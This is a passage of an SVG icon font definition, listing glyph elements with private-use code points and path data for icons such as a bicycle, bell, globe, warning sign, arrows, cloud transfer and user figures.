<glyph unicode="&#xe676;" d="M418.070 270.927c-11.795 0-23.040-2.283-33.445-6.264l-41.983 83.026h32.778v17.060h-60.518l17.252-34.12h-147.775l-8.614 17.060h29.055v17.060h-56.777l19.184-37.993c-0.1-0.142-0.233-0.258-0.316-0.408l-36.169-62.959c-11.313 4.84-23.749 7.539-36.811 7.539-51.738 0-93.83-42.092-93.83-93.839 0-51.738 42.092-93.83 93.83-93.83 48.856 0 89.074 37.552 93.398 85.3h69.831c3.040 0 5.847 1.616 7.38 4.249l78.769 135.755 26.015-51.446c-26.981-16.494-45.083-46.149-45.083-80.028 0-51.746 42.092-93.838 93.83-93.838s93.83 42.091 93.83 93.838-42.092 93.838-93.831 93.838zM176.39 308.604l62.101-122.986h-51.163c-2.632 29.047-18.526 54.296-41.584 69.631l30.646 53.355zM170.2 185.619h-64.466l31.496 54.821c17.968-12.329 30.438-32.088 32.97-54.821zM93.93 100.319c-42.334 0-76.77 34.436-76.77 76.77s34.436 76.779 76.77 76.779c9.972 0 19.468-1.966 28.215-5.44l-38.544-67.090c-1.516-2.641-1.508-5.889 0.017-8.521s4.339-4.257 7.38-4.257h79.202c-4.265-38.327-36.826-68.241-76.27-68.241zM255.109 190.559l-62.117 123.010h133.498l-71.381-123.010zM418.070 100.311c-42.334 0-76.77 34.444-76.77 76.778 0 27.231 14.295 51.139 35.737 64.775l36.119-71.439 15.227 7.697-36.011 71.222c8.047 2.875 16.677 4.523 25.698 4.523 42.334 0 76.77-34.445 76.77-76.779s-34.436-76.777-76.77-76.777z" />
<glyph unicode="&#xe677;" d="M401.177 138.004v137.089c0 71.388-51.664 130.599-119.587 142.644v10.896c0 9.421-7.647 17.060-17.060 17.060h-17.060c-9.429 0-17.060-7.639-17.060-17.060v-10.946c-67.79-12.178-119.253-71.322-119.253-142.594v-137.088l-59.877-48.465v-27.656h409.44v27.656l-59.543 48.464zM443.66 78.944h-375.32v2.457l59.877 48.464v145.228c0 70.556 57.394 127.95 127.95 127.95 70.539 0 127.95-57.394 127.95-127.95v-145.202l59.543-48.464v-2.483zM255.984 2.307c23.573 0 42.699 19.076 42.699 42.65h-85.366c0.017-23.574 19.126-42.65 42.667-42.65z" />
<glyph unicode="&#xe678;" d="M0.325 309.616v-171.225c0-13.961 11.321-25.281 25.274-25.281h213.566v221.78h-213.567c-13.952 0-25.273-11.312-25.273-25.274zM222.105 130.17h-196.507c-4.531 0-8.214 3.69-8.214 8.221v171.225c0 4.531 3.682 8.214 8.214 8.214h196.506v-187.66zM511.675 224c0 28.114-22.675 50.922-50.731 51.154v34.462c0 13.961-11.312 25.274-25.274 25.274h-179.445v-17.060h179.446c4.532 0 8.214-3.682 8.214-8.214v-171.225c0-4.531-3.682-8.221-8.214-8.221h-179.446v-17.060h179.446c13.962 0 25.274 11.32 25.274 25.281v34.454c28.056 0.233 50.73 23.032 50.73 51.155zM460.945 189.921v68.157c18.601-0.25 33.671-15.411 33.671-34.078-0.001-18.668-15.070-33.829-33.671-34.079z" />
<glyph unicode="&#xe679;" d="M255.983 437.25c-117.77 0-213.233-95.488-213.233-213.267 0-117.77 95.462-213.233 213.233-213.233s213.267 95.463 213.267 213.233c0 117.779-95.496 213.267-213.267 213.267zM451.973 232.513h-152.99c1.633 58.61 19.975 114.305 53.396 162.27 57.194-32.413 96.595-92.681 99.594-162.27zM255.983 420.19c28.822 0 56.162-6.298 80.835-17.493-34.57-50.397-53.462-108.824-55.062-170.184h-51.513c-1.616 61.36-20.492 119.795-55.079 170.184 24.674 11.204 52.014 17.493 80.819 17.493zM159.621 394.783c33.42-47.948 51.763-103.651 53.395-162.27h-152.989c2.982 69.589 42.4 129.866 99.594 162.27zM60.027 215.453h153.157c-1.633-58.652-19.942-114.405-53.38-162.353-57.295 32.379-96.779 92.697-99.777 162.353zM255.983 27.81c-28.805 0-56.144 6.289-80.818 17.493 34.587 50.38 53.463 108.774 55.079 170.15h51.513c1.6-61.392 20.492-119.77 55.062-170.15-24.675-11.195-52.014-17.493-80.836-17.493zM352.146 53.084c-33.421 47.948-51.713 103.701-53.33 162.369h153.157c-2.999-69.665-42.5-129.99-99.827-162.369z" />
<glyph unicode="&#xe67a;" d="M230.231 352.708v-69.99l16.894-0.166c117.354-1.133 183.462-53.33 200.68-159.105-64.467 74.571-138.805 74.605-200.506 74.622h-17.069v-69.39l-158.145 112.023 158.146 112.006zM247.291 385.712l-204.72-145.010 204.72-145.010v85.317c81.935-0.033 157.897-4.165 222.138-118.721 0 72.755-12.020 235.292-222.138 237.324v86.1z" />
<glyph unicode="&#xe67b;" d="M255.992 424.455l-230.302-400.91h460.62l-230.318 400.91zM255.992 390.202l200.846-349.597h-401.676l200.83 349.597zM247.462 262.385h17.060v-119.42h-17.060v119.42zM255.975 117.375c-7.064 0-12.77-5.73-12.77-12.795 0-7.047 5.707-12.778 12.77-12.778 7.089 0 12.82 5.731 12.82 12.778 0 7.065-5.73 12.795-12.82 12.795z" />
<glyph unicode="&#xe67c;" d="M480.383 87.57l-34.744 70.564-75.329-30.738 6.448-15.794 50.422 20.567c-23.216-67.906-85.958-117.52-160.762-121.061v307.323c33.646 4.206 59.71 32.853 59.71 67.648 0 37.686-30.563 68.231-68.248 68.231-37.677 0-68.232-30.546-68.232-68.231 0-34.795 26.065-63.45 59.71-67.648v-307.322c-74.154 3.515-136.471 52.28-160.162 119.278l46.048-18.784 6.448 15.794-75.329 30.738-34.746-70.565 15.31-7.53 24.415 49.581c25.5-78.761 99.404-135.931 186.544-135.931 85.417 0 158.222 54.879 185.095 131.216l22.091-44.866 15.311 7.53zM206.706 386.079c0 28.214 22.958 51.171 51.172 51.171 28.222 0 51.188-22.958 51.188-51.171 0-28.222-22.965-51.18-51.188-51.18-28.213 0-51.172 22.957-51.172 51.18z" />
<glyph unicode="&#xe67d;" d="M25.69 360.48v-341.2h460.62v341.2h-460.62zM469.25 36.34h-426.5v307.080h426.5v-307.080zM59.81 394.6h392.38v-17.060h-392.38v17.060zM93.93 428.72h324.14v-17.060h-324.14v17.060z" />
<glyph unicode="&#xe67e;" d="M255.875 386.053c-103.66 0-187.66-84.017-187.66-187.66 0-47.032 17.351-89.998 45.949-122.935l-43.9-53.812 13.211-10.779 42.542 52.13c33.712-32.338 79.444-52.246 129.858-52.246 50.53 0 96.362 20.009 130.107 52.496l42.517-52.447 13.261 10.746-43.932 54.195c28.455 32.904 45.707 75.754 45.707 122.652 0 103.643-84.034 187.66-187.66 187.66zM255.875 27.81c-94.072 0-170.6 76.52-170.6 170.583 0 94.080 76.528 170.6 170.6 170.6s170.6-76.52 170.6-170.6c0-94.063-76.528-170.583-170.6-170.583zM178.73 437.25h-50.68c-47.115 0-85.3-38.185-85.3-85.3v-51.33h24.257l111.723 112.356v24.274zM161.67 420.007l-101.86-102.327v34.27c0 37.618 30.613 68.24 68.24 68.24h33.62v-0.183zM383.95 437.25h-50.713v-24.274l111.74-112.356h24.274v51.33c-0.001 47.115-38.203 85.3-85.301 85.3zM452.19 317.68h-0.117l-101.776 102.327v0.183h33.653c37.627 0 68.24-30.622 68.24-68.24v-34.27zM247.47 198.41h-94.047v-17.060h111.107v153.54h-17.060z" />
<glyph unicode="&#xe67f;" d="M460.72 403.13h-409.44v-255.9h138.913l-87.733-102.36h307.080l-87.74 102.36h138.92v255.9zM139.554 61.93l116.438 135.856 116.454-135.856h-232.892zM443.66 164.29h-136.489l-51.18 59.71-51.18-59.71h-136.471v221.78h375.32v-221.78z" />
<glyph unicode="&#xe680;" d="M171.559 320.504l-12.063-12.063 84.442-84.442-84.042-84.043 12.063-12.063 84.042 84.042 84.043-84.042 12.063 12.063-84.042 84.043 84.442 84.442-12.063 12.063-84.443-84.442z" />
<glyph unicode="&#xe681;" d="M105.211 374.789c-83.288-83.288-83.288-218.293 0-301.581s218.29-83.285 301.578 0.003c83.288 83.288 83.291 218.29 0.003 301.578s-218.293 83.288-301.581 0zM394.726 85.274c-76.491-76.491-200.961-76.494-277.452-0.003s-76.491 200.964 0 277.455c76.491 76.491 200.963 76.491 277.455 0 76.49-76.491 76.487-200.961-0.003-277.452zM171.559 320.504l-12.063-12.063 84.442-84.442-84.042-84.043 12.063-12.063 84.042 84.042 84.043-84.042 12.063 12.063-84.042 84.043 84.442 84.442-12.063 12.063-84.443-84.442z" />
<glyph unicode="&#xe682;" d="M268.271 275.051l-12.071 12.071-96.565-96.566 12.069-12.069 84.496 84.495 84.096-84.096 12.069 12.071-48.203 48.203z" />
<glyph unicode="&#xe683;" d="M255.608 10.736c117.862 0 213.386 95.523 213.386 213.386s-95.523 213.386-213.386 213.386-213.385-95.524-213.385-213.386 95.523-213.386 213.385-213.386zM255.608 420.437c108.243 0 196.315-88.070 196.315-196.315 0-108.243-88.072-196.315-196.315-196.315s-196.315 88.072-196.315 196.315c0 108.245 88.072 196.315 196.315 196.315zM267.795 275.051l-12.071 12.071-96.564-96.566 12.069-12.069 84.495 84.495 84.097-84.096 12.069 12.071-48.203 48.203z" />
<glyph unicode="&#xe684;" d="M306.538 211.729l12.070 12.071-96.566 96.565-12.069-12.069 84.496-84.496-84.097-84.096 12.071-12.069 48.203 48.203z" />
<glyph unicode="&#xe685;" d="M42.223 224.122c0-117.862 95.523-213.386 213.386-213.386s213.386 95.523 213.386 213.386-95.524 213.386-213.387 213.386-213.385-95.524-213.385-213.386zM451.923 224.122c0-108.243-88.070-196.315-196.315-196.315-108.243 0-196.315 88.072-196.315 196.315s88.072 196.315 196.315 196.315c108.245 0 196.315-88.072 196.315-196.315zM306.538 211.935l12.070 12.071-96.566 96.565-12.069-12.069 84.496-84.496-84.097-84.096 12.071-12.069 48.203 48.203z" />
<glyph unicode="&#xe686;" d="M204.679 236.271l-12.071-12.071 96.567-96.565 12.069 12.069-84.496 84.496 84.096 84.096-12.070 12.069-48.203-48.203z" />
<glyph unicode="&#xe687;" d="M468.994 224.122c0 117.862-95.523 213.386-213.386 213.386s-213.385-95.524-213.385-213.386 95.523-213.386 213.386-213.386 213.385 95.524 213.385 213.386zM59.293 224.122c0 108.243 88.070 196.315 196.315 196.315 108.243 0 196.315-88.072 196.315-196.315s-88.072-196.315-196.315-196.315c-108.244 0-196.315 88.072-196.315 196.315zM204.679 236.309l-12.071-12.071 96.567-96.565 12.069 12.070-84.496 84.495 84.096 84.096-12.070 12.069-48.203-48.203z" />
<glyph unicode="&#xe688;" d="M243.729 173.193l12.071-12.071 96.565 96.567-12.069 12.069-84.496-84.496-84.096 84.096-12.069-12.071 48.203-48.203z" />
<glyph unicode="&#xe689;" d="M255.608 437.508c-117.862 0-213.386-95.523-213.386-213.386s95.523-213.386 213.386-213.386 213.386 95.523 213.386 213.386-95.523 213.386-213.386 213.386zM255.608 27.807c-108.243 0-196.315 88.070-196.315 196.315 0 108.243 88.072 196.315 196.315 196.315s196.315-88.072 196.315-196.315c0-108.245-88.072-196.315-196.315-196.315zM243.421 173.193l12.071-12.071 96.565 96.567-12.069 12.069-84.496-84.496-84.096 84.096-12.069-12.071 48.203-48.203z" />
<glyph unicode="&#xe68a;" d="M192.4 221.5l-12.1 12.1 76.4 76.4 76.4-76.4-12.1-12.1-55.8 55.8v-223.3h-17.1v223.3l-55.7-55.8zM419.1 326.9c0 1.4 0.2 2.7 0.2 4 0 73.1-59.2 132.3-132.3 132.3-52.6 0-97.9-30.8-119.2-75.3-9.2 4.6-19.6 7.3-30.6 7.3-33.8 0-61.8-24.6-67.2-56.8-40.2-13.8-69.2-51.9-69.2-96.8 0-56.5 45.8-102.3 102.3-102.3h111v17.1h-111c-47 0-85.2 38.3-85.2 85.3 0 36.4 23.2 68.8 57.7 80.7l9.6 3.3 1.7 10c4.2 24.7 25.4 42.6 50.4 42.6 8 0 15.7-1.9 22.9-5.5l15.6-7.8 7.5 15.7c19 39.7 59.7 65.4 103.7 65.4 63.5 0 115.2-51.7 115.2-115.2 0-0.3 0-0.7-0.1-1.1-0.1-0.8-0.1-1.7-0.1-2.6l-0.4-17.4 17.4-0.1c42.2-0.1 76.6-34.6 76.6-76.8 0-42.1-34.3-76.5-76.4-76.7h-119.8v-17.1h119.9c51.6 0.3 93.4 42.2 93.4 93.8-0.1 51.9-41.9 93.9-93.6 94z" />
<glyph unicode="&#xe68b;" d="M320.8 74.2l12.1-12.1-76.4-76.4-76.4 76.4 12.1 12.1 55.8-55.8v223.3h17v-223.3l55.8 55.8zM418.8 326.9c0 1.4 0.2 2.7 0.2 4 0 73.1-59.2 132.3-132.2 132.3-52.6 0-97.9-30.8-119.2-75.3-9.2 4.6-19.6 7.3-30.6 7.3-33.8 0-61.8-24.6-67.2-56.8-40.2-13.8-69.2-51.9-69.2-96.8 0-56.5 45.8-102.3 102.3-102.3h111v17.1h-111c-47 0-85.2 38.3-85.2 85.3 0 36.4 23.2 68.8 57.7 80.7l9.6 3.3 1.7 10c4.2 24.7 25.4 42.6 50.4 42.6 8 0 15.7-1.9 22.9-5.5l15.6-7.8 7.5 15.7c19.1 39.9 59.8 65.6 103.8 65.6 63.4-0.2 115.1-51.8 115.1-115.3 0-0.3 0-0.7-0.1-1.1-0.1-0.8-0.1-1.7-0.1-2.6l-0.4-17.4 17.4-0.1c42.2-0.1 76.6-34.6 76.6-76.8 0-42.1-34.3-76.5-76.4-76.7h-119.9v-17.1h119.9c51.6 0.3 93.4 42.2 93.4 93.8 0 51.8-41.9 93.8-93.6 93.9z" />
<glyph unicode="&#xe68c;" d="M268.548 307.922c-27.797 0-50.351-22.542-50.351-50.346 0-27.811 22.554-50.362 50.351-50.362 27.818 0 50.354 22.55 50.354 50.362 0 27.803-22.538 50.345-50.354 50.345zM268.548 224c-18.504 0-33.567 15.064-33.567 33.577 0 18.505 15.064 33.56 33.567 33.56 18.522 0 33.57-15.055 33.57-33.56 0-18.514-15.048-33.577-33.57-33.577zM67.136 383.452v-251.765h402.824v251.765h-402.824zM453.178 326.668v-178.198h-369.256v218.197h369.256v-39.998zM379.942 114.902h-329.589v234.98h-16.785v-251.765h402.825v16.786h-16.784zM346.373 81.332h-329.589v234.981h-16.784v-251.766h402.825v16.784h-16.786zM109.098 349.358h50.354v-16.784h-50.353v16.784zM109.098 182.039h50.354v-16.784h-50.353v16.784zM377.649 349.358h50.353v-16.784h-50.353v16.784zM377.649 182.039h50.353v-16.784h-50.353v16.784z" horiz-adv-x="470" />
<glyph unicode="&#xe68d;" d="M118.982-31.232v233.236l-101.787-101.731-11.867 11.875 107.804 107.736-113.13 113.036 11.867 11.875 107.115-107.037v241.476l138.684-138.611-120.8-120.74 116.704-116.618-134.586-134.496zM135.766 197.25v-187.98l94.067 93.994-94.067 93.986zM135.766 438.73v-196.217l98.165 98.109-98.166 98.108z" horiz-adv-x="258" />
<glyph unicode="&#xe68e;" d="M184.708 299.464h117.475l50.353 59.175-50.353 58.315h-117.476v33.63h-16.784v-33.63h-151.142v-117.49h151.142v-16.723h-117.573l-50.352-58.315 50.352-59.171h117.573v-167.844h16.784v167.844h151.043v117.486h-151.042v16.722zM33.569 316.249v83.921h260.928l35.93-41.608-35.995-42.313h-260.864zM318.967 265.957v-83.918h-260.846l-36.011 42.305 35.929 41.613 260.926-0zM50.23 383.452h83.922v-16.784h-83.922v16.784zM218.114 249.087h83.922v-16.785h-83.922v16.785z" horiz-adv-x="353" />
<glyph unicode="&#xe68f;" d="M268.567 282.745h117.476v-16.784h-117.476v16.784zM268.55 182.039h117.492v-16.784h-117.492v16.784zM268.55 232.393h83.792v-16.785h-83.792v16.785zM251.766 383.452v50.353h-67.138v-50.353h-184.628v-369.257h436.394v369.257h-184.627zM419.61 366.666v-33.568h-167.844v33.569h167.844zM201.412 417.020h33.57v-83.922h-33.57v83.922zM16.785 366.666h167.845v-33.568h-167.845v33.569zM16.785 30.979v285.334h402.825v-285.334h-402.825zM247.406 105.575c-12.113 5.046-40.716 14.981-58.435 20.209-1.508 0.474-1.736 0.558-1.736 6.851 0 5.18 2.129 10.408 4.21 14.834 2.244 4.812 4.934 12.89 5.884 20.144 2.689 3.13 6.343 9.277 8.72 21.005 2.049 10.327 1.097 14.088-0.279 17.628-0.148 0.37-0.296 0.729-0.41 1.098-0.524 2.428 0.196 15.012 1.968 24.786 1.212 6.696-0.311 20.952-9.54 32.743-5.82 7.452-16.964 16.6-37.341 17.87l-11.178-0.008c-20.014-1.262-31.177-10.413-36.995-17.862-9.228-11.792-10.767-26.048-9.555-32.743 1.787-9.774 2.49-22.358 1.984-24.736-0.097-0.42-0.263-0.779-0.408-1.149-1.361-3.541-2.328-7.301-0.264-17.628 2.344-11.728 6-17.874 8.704-21.005 0.933-7.254 3.623-15.334 5.884-20.144 1.654-3.516 2.442-8.303 2.442-15.065 0-6.293-0.246-6.37-1.656-6.82-18.308-5.409-47.468-15.94-58.334-20.694-8.622-3.697-10.72-10.334-10.72-16.318 0-1.673 0-4.293 0-7.245h16.785v7.248c0 0.269 0.016 0.476 0.032 0.639 0.147 0.082 0.344 0.18 0.624 0.293 10.326 4.524 38.928 14.834 56.696 20.079 13.357 4.245 13.357 16.784 13.357 22.817 0 9.293-1.279 16.358-4.031 22.228-1.688 3.582-3.754 9.93-4.428 15.137l-0.654 5.007-3.293 3.82c-0.508 0.574-3.066 3.902-4.951 13.326-1.278 6.358-0.82 7.54-0.558 8.228 0.442 1.082 0.82 2.163 1.163 3.688 1.476 6.786-0.475 23.73-1.85 31.282-0.459 2.475 0.197 11.677 6.245 19.419 5.31 6.794 13.506 10.634 24.357 11.412l10.064 0.008c11.048-0.786 19.341-4.625 24.653-11.424 6.065-7.738 6.704-16.94 6.262-19.403-1.377-7.548-3.328-24.486-1.869-31.313l0.146-0.652 0.18-0.64c0.231-0.73 0.476-1.442 0.838-2.377 0.279-0.697 0.736-1.87-0.524-8.209-1.903-9.433-4.476-12.793-4.986-13.375l-3.262-3.788-0.656-4.966c-0.689-5.22-2.752-11.603-4.426-15.178-2.72-5.753-5.82-13.459-5.82-21.996 0-6.033 0-18.589 13.769-22.948 16.768-4.952 44.879-14.654 56.564-19.541 1.77-0.754 2.41-1.686 2.593-2.033v-6.786h16.785c0 2.952 0 5.572 0 7.245-0 5.988-4.149 13.298-12.754 17.002z" horiz-adv-x="437" />
<glyph unicode="&#xe690;" d="M210.149 306.852h-16.786v-95.784l52.813-52.812 11.868 11.868-47.896 47.894zM439.13 324.875l-118.686 118.687-89.397-89.405c-9.458 1.983-19.244 3.049-29.291 3.049-78.66 0-142.667-63.999-142.667-142.664 0-10.033 1.082-19.832 3.048-29.291l-62.138-62.138 24.718-95.928 93.969-22.75 68.22 68.219c4.884-0.491 9.834-0.77 14.85-0.77 78.676 0 142.667 64 142.667 142.658 0 5.015-0.264 9.97-0.771 14.855l95.478 95.48zM320.445 419.824l94.952-94.949-75.463-75.456c-11.688 46.288-45.978 83.562-90.48 99.411l70.99 70.993zM113.474 22.957l-75.004 18.161-19.834 76.9 48.828 48.827c15.867-44.502 53.139-78.784 99.429-90.469l-53.422-53.418zM201.756 88.668c-69.4 0-125.882 56.459-125.882 125.875 0 69.412 56.483 125.877 125.882 125.877 69.415 0 125.883-56.466 125.883-125.877 0-69.416-56.467-125.875-125.882-125.875z" horiz-adv-x="439" />
<glyph unicode="&#xe691;" d="M50.434 253.398c0-88.061 71.382-159.444 159.434-159.444 88.089 0 159.468 71.382 159.468 159.444 0 88.076-71.379 159.458-159.468 159.458-88.050-0.002-159.434-71.38-159.434-159.458zM209.871 396.068c78.677 0 142.682-64.002 142.682-142.671 0-78.659-64.007-142.657-142.682-142.657-78.66 0-142.653 63.998-142.653 142.657 0.001 78.669 63.99 142.672 142.653 142.672zM304.94 66.204l8.079-16.324 15.048 7.442-22.818 46.074-15.046-7.458 7.277-14.67c-26.995-13.752-57.058-21.046-87.611-21.046-106.474 0-193.084 86.658-193.084 193.176 0 72.563 41.109 139.118 105.312 171.99l7.802-15.752 15.031 7.45-22.818 46.063-15.030-7.451 7.573-15.28c-69.891-35.692-114.654-108.082-114.654-187.022 0-112.959 89.642-205.32 201.494-209.747v-25.538c-38.75-1.507-74.841-13.457-105.46-33.257h35.109c24.030 10.752 50.632 16.784 78.628 16.784 27.506 0 54.139-5.966 78.447-16.784h35.258c-30.995 19.964-67.219 31.7-105.197 33.257v25.603c30.224 1.214 59.826 8.868 86.659 22.49z" horiz-adv-x="370" />
<glyph unicode="&#xe692;" d="M218.166 395.616l-122.983-98.038h-95.183v-75.878l-0.066-0.044 0.066-0.044v-75.091h95.674l122.49-96.126v96.125h0.032v151.060h-0.032v98.038h0.002zM201.414 163.303h-0.032v-78.399l-99.904 78.399h-84.692v117.491h84.266l100.329 79.98v-63.196l0.032-16.784v-117.49h0.001zM257.389 308.339c18.26-24.329 27.914-53.322 27.914-83.851 0-31.163-10.030-60.652-28.995-85.278l13.308-10.236c21.243 27.587 32.471 60.615 32.471 95.516 0 34.191-10.818 66.67-31.274 93.924l-13.425-10.074zM325 369.173l-12.948-10.686c31.536-38.188 48.91-86.553 48.91-136.192 0-49.050-16.144-95.19-46.666-133.425l13.13-10.474c32.913 41.24 50.32 90.995 50.32 143.899 0.002 53.529-18.733 105.692-52.745 146.88zM377.255 423.669l-12.59-11.088c46.289-52.566 71.776-120.163 71.776-190.346 0-68.76-24.601-135.332-69.267-187.438l12.736-10.916c47.289 55.139 73.318 125.588 73.318 198.356-0.002 74.267-26.98 145.806-75.974 201.433z" horiz-adv-x="454" />
<glyph unicode="&#xe693;" d="M0.001 128.040c0-7.344 0-29.12 0-33.922s2.852-13.014 13.146-13.014c7.9 0 71.006 0 99.918 0 8.754 0 14.406 0 14.406 0h2.476c0 0 1.656 0 4.328 0 0-7.736 0-14.786 0-17.483 0-5.94 3.524-16.088 16.276-16.088 9.786 0 88.15 0 123.93 0 10.834 0 17.85 0 17.85 0h3.065c0 0 6.884 0 17.555 0 35.666 0 114.149 0 123.951 0 12.735 0 16.274 10.147 16.274 16.088s0 32.874 0 41.961-3.212 19.161-16.274 24.776c-16.508 7.228-60.78 23.226-88.596 31.438-2.147 0.68-2.508 0.793-2.508 10.342 0 10.277 1.18 17.548 3.688 22.89 3.442 7.302 7.507 19.579 8.95 30.594 4.096 4.737 9.654 14.080 13.209 31.888 3.149 15.695 1.673 21.406-0.394 26.766-0.229 0.566-0.459 1.123-0.623 1.754-0.771 3.606 0.294 22.726 3 37.568 1.85 10.171-0.476 31.815-14.49 49.723-8.849 11.317-25.798 25.208-56.204 27.126l-16.964 0.016c-30.93-1.934-47.861-15.826-56.712-27.142-14.012-17.908-16.34-39.552-14.488-49.731 2.688-14.834 3.769-33.955 2.983-37.634-0.164-0.558-0.393-1.115-0.607-1.68-2.082-5.36-3.541-11.072-0.41-26.766 3.572-17.808 9.13-27.152 13.21-31.888 1.459-11.014 5.524-23.292 8.951-30.594 3.162-6.72 6.407-14.662 6.407-22.546 0-9.546-0.361-9.661-2.654-10.382-5.721-1.68-12.21-3.705-19.030-5.892-16.063 5.966-36.272 12.95-50.928 17.286-1.737 0.546-2.031 0.639-2.031 8.36 0 8.31 0.966 14.185 2.982 18.505 2.788 5.909 6.066 15.825 7.246 24.734 3.294 3.827 7.786 11.384 10.671 25.784 2.542 12.686 1.344 17.3-0.328 21.636-0.18 0.458-0.361 0.909-0.49 1.418-0.624 2.918 0.23 18.375 2.407 30.374 1.492 8.22-0.375 25.717-11.702 40.207-7.146 9.138-20.849 20.374-45.404 21.93h-13.701c-24.998-1.556-38.666-12.793-45.83-21.93-11.326-14.49-13.21-31.986-11.704-40.207 2.164-11.998 3.049-27.456 2.409-30.438-0.13-0.442-0.328-0.894-0.492-1.352-1.689-4.335-2.868-8.95-0.328-21.636 2.885-14.399 7.376-21.956 10.671-25.784 1.18-8.907 4.458-18.823 7.228-24.734 2.556-5.433 5.18-11.851 5.18-18.226 0-7.72-0.296-7.812-2.147-8.401-21.734-6.418-56.844-18.605-71.71-24.824-10.553-4.534-15.62-13.515-15.62-20.866zM151.061 105.584c0 2.491 2.49 7.515 9.18 10.384 17.653 7.375 60.892 22.284 87.167 30.038 14.685 4.613 14.685 17.252 14.685 26.479 0 11.18-4.048 21.286-8.014 29.692-2.738 5.86-6.263 16.4-7.49 25.653l-0.655 4.958-3.278 3.794c-1.804 2.094-6.345 8.654-9.459 24.234-2.426 12.17-1.359 14.94-0.409 17.387l0.017 0.024 0.146 0.414c0.347 0.861 0.656 1.726 0.904 2.582l0.18 0.606 0.131 0.623c1.72 8.024-0.524 31.114-2.884 44.133-1.066 5.86 0.279 22.439 11.194 36.396 9.72 12.416 24.52 19.378 44.028 20.702l15.882-0.016c23.882-1.639 36.848-12.134 43.536-20.68 10.932-13.961 12.26-30.536 11.194-36.376-2.31-12.688-4.589-36.166-2.901-44.084l0.082-0.356 0.098-0.357c0.346-1.356 0.786-2.574 1.277-3.786 0.87-2.258 1.952-5.065-0.474-17.214-3.115-15.592-7.654-22.124-9.459-24.206l-3.294-3.811-0.639-4.99c-1.229-9.26-4.736-19.767-7.507-25.618-3.606-7.697-5.279-17.236-5.279-30.046 0-9.212 0-21.832 14.209-26.34 27.078-7.998 71.039-23.858 86.938-30.817 4.736-2.032 6.229-4.31 6.229-9.4v-41.264h-285.25l-0.082 41.262zM16.785 128.040c0.032 0.654 1.066 3.557 5.459 5.44 14.392 6.024 49.058 18.014 69.842 24.152 14.178 4.508 14.178 17.022 14.178 24.497 0 9.652-3.426 18.241-6.786 25.373-2.18 4.663-4.868 12.981-5.77 19.792l-0.656 4.958-3.262 3.786c-1.016 1.173-4.492 5.946-6.933 18.129-1.786 8.917-1.066 10.765-0.492 12.252l0.098 0.221 0.066 0.221c0.344 0.869 0.573 1.558 0.77 2.234l0.197 0.62 0.13 0.63c1.656 7.736-0.722 28.209-2.311 36.945-0.737 4.106 0.344 16.538 8.424 26.881 7.245 9.252 18.391 14.465 33.142 15.481h12.604c18.030-1.274 27.75-9.106 32.734-15.486 8.064-10.326 9.162-22.779 8.424-26.874-1.689-9.228-3.901-29.458-2.328-36.872l0.082-0.347 0.082-0.346c0.314-1.18 0.689-2.246 1.099-3.307 0.574-1.471 1.294-3.356-0.476-12.256-2.442-12.186-5.917-16.944-6.934-18.112l-3.262-3.794-0.655-4.964c-0.918-6.844-3.607-15.147-5.803-19.801-3.113-6.671-4.572-14.808-4.572-25.642 0-7.485 0-20.014 13.751-24.368 8.686-2.572 19.506-6.128 30.192-9.849-17.654-6.048-34.487-12.18-44.208-16.243-13.081-5.614-19.341-16.719-19.341-25.808 0-1.894 0-4.598 0-7.695h-117.492v30.151z" horiz-adv-x="453" />
<glyph unicode="&#xe694;" d="M201.34 425.413c-111.246 0-201.412-90.183-201.412-201.413s90.166-201.412 201.412-201.412c111.23 0 201.411 90.182 201.411 201.412s-90.183 201.413-201.411 201.413zM90.864 76.152c12.326 4.534 25.848 9.106 37.88 13.147 41.093 13.81 47.419 15.93 47.419 29.791v32.413l-14.031 2.336c-1 0.173-24.636 4.072-40.518 4.072-8.195 0-12.85 0.204-17.343 3.154 11.556 25.292 23.505 64.86 28.029 96.162l0.869-0.298 1.246 22.181c1.968 35.54 31.356 63.38 66.924 63.38 35.552 0 64.941-27.84 66.924-63.38l1.459-22.1 0.639 0.217c4.524-31.302 16.473-70.87 28.029-96.162-4.474-2.95-9.146-3.154-17.325-3.154-16.112 0-38.944-5.080-41.484-5.663l-13.066-2.966v-30.192c0-13.71 6.556-16.031 49.238-31.11 11.064-3.918 23.438-8.302 34.913-12.647-30.634-22.578-68.45-35.962-109.327-35.962-41.387-0.002-79.644 13.685-110.475 36.779zM325.582 87.553c-34.24 13.548-82.281 28.438-82.281 31.538 0 3.846 0 16.792 0 16.792s23.078 5.244 37.764 5.244 25.178 0.918 37.766 16.652c-15.736 27.798-33.57 90.347-33.57 122.343l-0.245-0.082c-2.442 44.157-38.912 79.234-83.676 79.234s-81.234-35.077-83.692-79.234l-0.23 0.082c0-31.996-17.834-94.543-33.57-122.343 12.59-15.736 23.078-16.652 37.764-16.652s37.766-3.844 37.766-3.844 0-14.348 0-18.194c0-3.147-49.141-17.301-83.299-30.576-36.486 33.757-59.368 81.986-59.368 135.486 0 101.805 82.824 184.628 184.628 184.628s184.626-82.824 184.626-184.628c0.002-53.998-23.304-102.654-60.382-136.446z" horiz-adv-x="403" />
<glyph unicode="&#xe695;" d="M419.541 224c0 115.884-93.936 209.804-209.804 209.804s-209.804-93.92-209.804-209.804c0-115.868 93.936-209.804 209.805-209.804 115.867 0 209.804 93.937 209.804 209.804zM16.715 224c0 106.435 86.594 193.020 193.020 193.020 106.442 0 193.020-86.585 193.020-193.020s-86.578-193.020-193.020-193.020c-106.427 0-193.020 86.586-193.020 193.020zM299.934 236.736l11.868 11.868-102.065 102.058-102.052-102.058 11.87-11.868 81.791 81.799v-203.632h16.782v203.632z" horiz-adv-x="420" />
<glyph unicode="&#xe696;" d="M302.118 224c0 83.43-67.629 151.060-151.059 151.060s-151.060-67.628-151.060-151.060c0-83.43 67.629-151.060 151.060-151.060s151.059 67.63 151.059 151.060zM151.060 89.724c-74.038 0-134.274 60.238-134.274 134.276s60.237 134.275 134.274 134.275c74.038 0 134.274-60.237 134.274-134.275s-60.237-134.275-134.274-134.275zM352.471 375.060h-128.734c9.769-4.721 18.998-10.343 27.602-16.784h101.132c74.041 0 134.274-60.236 134.274-134.275s-60.236-134.275-134.274-134.275h-101.132c-8.606-6.442-17.834-12.063-27.602-16.784h128.734c83.43 0 151.060 67.63 151.060 151.060s-67.63 151.060-151.060 151.060z" horiz-adv-x="504" />
